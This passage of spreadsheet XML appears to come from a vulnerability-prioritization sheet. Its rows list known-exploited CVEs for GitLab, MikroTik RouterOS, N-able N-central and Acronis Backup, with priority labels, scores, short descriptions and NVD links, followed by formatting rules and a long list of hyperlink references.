t="inlineStr" /><c r="Q1691" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="R1691" s="5" t="inlineStr" /><c r="S1691" s="5" t="inlineStr"><is><t>GitLab Community Edition and Enterprise Edition contains a path traversal vulnerability that allows an unauthenticated user to read arbitrary files due to an improper path confinement and missing authentication enforcement in the repository commits API.</t></is></c><c r="T1691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t></is></c></row><row r="1692"><c r="A1692" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1692" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1692" s="5" t="inlineStr"><is><t>CVE-2026-86060</t></is></c><c r="D1692" s="5" t="inlineStr" /><c r="E1692" s="5" t="inlineStr" /><c r="F1692" s="5" t="inlineStr" /><c r="G1692" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1692" s="5" t="n"><v>0.011</v></c><c r="I1692" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1692" s="5" t="inlineStr" /><c r="K1692" s="5" t="inlineStr"><is><t>mikrotik:routeros</t></is></c><c r="L1692" s="5" t="inlineStr" /><c r="M1692" s="5" t="inlineStr" /><c r="N1692" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1692" s="5" t="inlineStr" /><c r="P1692" s="5" t="inlineStr" /><c r="Q1692" s="5" t="inlineStr"><is><t>2026-09-13</t></is></c><c r="R1692" s="5" t="inlineStr" /><c r="S1692" s="5" t="inlineStr"><is><t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t></is></c><c r="T1692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t></is></c></row><row r="1693"><c r="A1693" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1693" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1693" s="5" t="inlineStr"><is><t>CVE-2026-86218</t></is></c><c r="D1693" s="5" t="inlineStr" /><c r="E1693" s="5" t="inlineStr" /><c r="F1693" s="5" t="inlineStr" /><c r="G1693" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1693" s="5" t="n"><v>0.007</v></c><c r="I1693" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J1693" s="5" t="inlineStr" /><c r="K1693" s="5" t="inlineStr"><is><t>n-able:n-central</t></is></c><c r="L1693" s="5" t="inlineStr" /><c r="M1693" s="5" t="inlineStr" /><c r="N1693" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O1693" s="5" t="inlineStr" /><c r="P1693" s="5" t="inlineStr" /><c r="Q1693" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="R1693" s="5" t="inlineStr" /><c r="S1693" s="5" t="inlineStr"><is><t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t></is></c><c r="T1693" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t></is></c></row><row r="1694"><c r="A1694" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B1694" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C1694" s="5" t="inlineStr"><is><t>CVE-2026-87886</t></is></c><c r="D1694" s="5" t="inlineStr" /><c r="E1694" s="5" t="inlineStr" /><c r="F1694" s="5" t="inlineStr" /><c r="G1694" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H1694" s="5" t="inlineStr" /><c r="I1694" s="5" t="inlineStr" /><c r="J1694" s="5" t="inlineStr" /><c r="K1694" s="5" t="inlineStr"><is><t>acronis:backup</t></is></c><c r="L1694" s="5" t="inlineStr" /><c r="M1694" s="5" t="inlineStr" /><c r="N1694" s="5" t="inlineStr"><is><t>KEV</t></is></c><c r="O1694" s="5" t="inlineStr" /><c r="P1694" s="5" t="inlineStr" /><c r="Q1694" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="R1694" s="5" t="inlineStr" /><c r="S1694" s="5" t="inlineStr"><is><t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t></is></c><c r="T1694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t></is></c></row></sheetData><autoFilter ref="A1:T1694" /><conditionalFormatting sqref="E2:E1694"><cfRule type="cellIs" priority="1" operator="equal" dxfId="0"><formula>"CRITICAL"</formula></cfRule><cfRule type="cellIs" priority="2" operator="equal" dxfId="1"><formula>"HIGH"</formula></cfRule><cfRule type="cellIs" priority="3" operator="equal" dxfId="2"><formula>"MEDIUM"</formula></cfRule><cfRule type="cellIs" priority="4" operator="equal" dxfId="3"><formula>"LOW"</formula></cfRule></conditionalFormatting><conditionalFormatting sqref="G2:G1694"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T954" r:id="rId953" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T955" r:id="rId954" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T956" r:id="rId955" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T957" r:id="rId956" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T958" r:id="rId957" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T959" r:id="rId958" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T960" r:id="rId959" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T961" r:id="rId960" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T962" r:id="rId961" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T963" r:id="rId962" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T964" r:id="rId963" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T965" r:id="rId964" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T966" r:id="rId965" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T967" r:id="rId966" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T968" r:id="rId967" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T969" r:id="rId968" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T970" r:id="rId969" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T971" r:id="rId970" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T972" r:id="rId971" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T973" r:id="rId972" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T974" r:id="rId973" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T975" r:id="rId974" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T976" r:id="rId975" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T977" r:id="rId976" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T978" r:id="rId977" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T979" r:id="rId978" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T980" r:id="rId979" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T981" r:id="rId980" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T982" r:id="rId981" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T983" r:id="rId982" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T984" r:id="rId983" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T985" r:id="rId984" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T986" r:id="rId985" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T987" r:id="rId986" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T988" r:id="rId987" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T989" r:id="rId988" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T990" r:id="rId989" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T991" r:id="rId990" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T992" r:id="rId991" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T993" r:id="rId992" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T994" r:id="rId993" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T995" r:id="rId994" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T996" r:id="rId995" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T997" r:id="rId996" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T998" r:id="rId997" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T999" r:id="rId998" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1000" r:id="rId999" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1001" r:id="rId1000" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1002" r:id="rId1001" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1003" r:id="rId1002" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1004" r:id="rId1003" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1005" r:id="rId1004" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1006" r:id="rId1005" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1007" r:id="rId1006" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1008" r:id="rId1007" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1009" r:id="rId1008" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1010" r:id="rId1009" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1011" r:id="rId1010" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1012" r:id="rId1011" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1013" r:id="rId1012" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1014" r:id="rId1013" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1015" r:id="rId1014" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1016" r:id="rId1015" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1017" r:id="rId1016" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1018" r:id="rId1017" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1019" r:id="rId1018" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1020" r:id="rId1019" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1021" r:id="rId1020" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1022" r:id="rId1021" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1023" r:id="rId1022" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1024" r:id="rId1023" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1025" r:id="rId1024" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1026" r:id="rId1025" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1027" r:id="rId1026" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1028" r:id="rId1027" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1029" r:id="rId1028" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1030" r:id="rId1029" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1031" r:id="rId1030" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1032" r:id="rId1031" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1033" r:id="rId1032" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1034" r:id="rId1033" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1035" r:id="rId1034" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1036" r:id="rId1035" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1037" r:id="rId1036" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1038" r:id="rId1037" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1039" r:id="rId1038" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1040" r:id="rId1039" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1041" r:id="rId1040" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1042" r:id="rId1041" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1043" r:id="rId1042" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1044" r:id="rId1043" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1045" r:id="rId1044" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1046" r:id="rId1045" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1047" r:id="rId1046" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1048" r:id="rId1047" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1049" r:id="rId1048" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1050" r:id="rId1049" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1051" r:id="rId1050" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1052" r:id="rId1051" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1053" r:id="rId1052" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1054" r:id="rId1053" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1055" r:id="rId1054" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1056" r:id="rId1055" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1057" r:id="rId1056" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1058" r:id="rId1057" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1059" r:id="rId1058" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1060" r:id="rId1059" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1061" r:id="rId1060" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1062" r:id="rId1061" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1063" r:id="rId1062" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1064" r:id="rId1063" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1065" r:id="rId1064" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1066" r:id="rId1065" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1067" r:id="rId1066" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1068" r:id="rId1067" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1069" r:id="rId1068" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1070" r:id="rId1069" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1071" r:id="rId1070" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1072" r:id="rId1071" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1073" r:id="rId1072" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1074" r:id="rId1073" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1075" r:id="rId1074" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1076" r:id="rId1075" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1077" r:id="rId1076" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1078" r:id="rId1077" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1079" r:id="rId1078" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1080" r:id="rId1079" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1081" r:id="rId1080" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1082" r:id="rId1081" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1083" r:id="rId1082" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1084" r:id="rId1083" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1085" r:id="rId1084" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1086" r:id="rId1085" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1087" r:id="rId1086" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1088" r:id="rId1087" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1089" r:id="rId1088" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1090" r:id="rId1089" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1091" r:id="rId1090" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1092" r:id="rId1091" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1093" r:id="rId1092" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1094" r:id="rId1093" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1095" r:id="rId1094" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1096" r:id="rId1095" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1097" r:id="rId1096" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1098" r:id="rId1097" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1099" r:id="rId1098" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1100" r:id="rId1099" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1101" r:id="rId1100" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1102" r:id="rId1101" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1103" r:id="rId1102" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1104" r:id="rId1103" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1105" r:id="rId1104" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1106" r:id="rId1105" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1107" r:id="rId1106" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1108" r:id="rId1107" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1109" r:id="rId1108" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1110" r:id="rId1109" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1111" r:id="rId1110" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1112" r:id="rId1111" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1113" r:id="rId1112" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1114" r:id="rId1113" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1115" r:id="rId1114" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1116" r:id="rId1115" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1117" r:id="rId1116" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1118" r:id="rId1117" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1119" r:id="rId1118" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1120" r:id="rId1119" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1121" r:id="rId1120" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1122" r:id="rId1121" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1123" r:id="rId1122" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1124" r:id="rId1123" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1125" r:id="rId1124" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1126" r:id="rId1125" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1127" r:id="rId1126" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1128" r:id="rId1127" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1129" r:id="rId1128" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1130" r:id="rId1129" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1131" r:id="rId1130" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1132" r:id="rId1131" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1133" r:id="rId1132" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1134" r:id="rId1133" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1135" r:id="rId1134" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1136" r:id="rId1135" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1137" r:id="rId1136" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1138" r:id="rId1137" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1139" r:id="rId1138" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1140" r:id="rId1139" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1141" r:id="rId1140" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1142" r:id="rId1141" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1143" r:id="rId1142" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1144" r:id="rId1143" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1145" r:id="rId1144" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1146" r:id="rId1145" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1147" r:id="rId1146" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1148" r:id="rId1147" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1149" r:id="rId1148" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1150" r:id="rId1149" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1151" r:id="rId1150" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1152" r:id="rId1151" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1153" r:id="rId1152" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1154" r:id="rId1153" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1155" r:id="rId1154" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1156" r:id="rId1155" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1157" r:id="rId1156" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1158" r:id="rId1157" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1159" r:id="rId1158" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1160" r:id="rId1159" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1161" r:id="rId1160" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1162" r:id="rId1161" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1163" r:id="rId1162" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1164" r:id="rId1163" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1165" r:id="rId1164" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1166" r:id="rId1165" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1167" r:id="rId1166" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1168" r:id="rId1167" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1169" r:id="rId1168" /><hyperlink 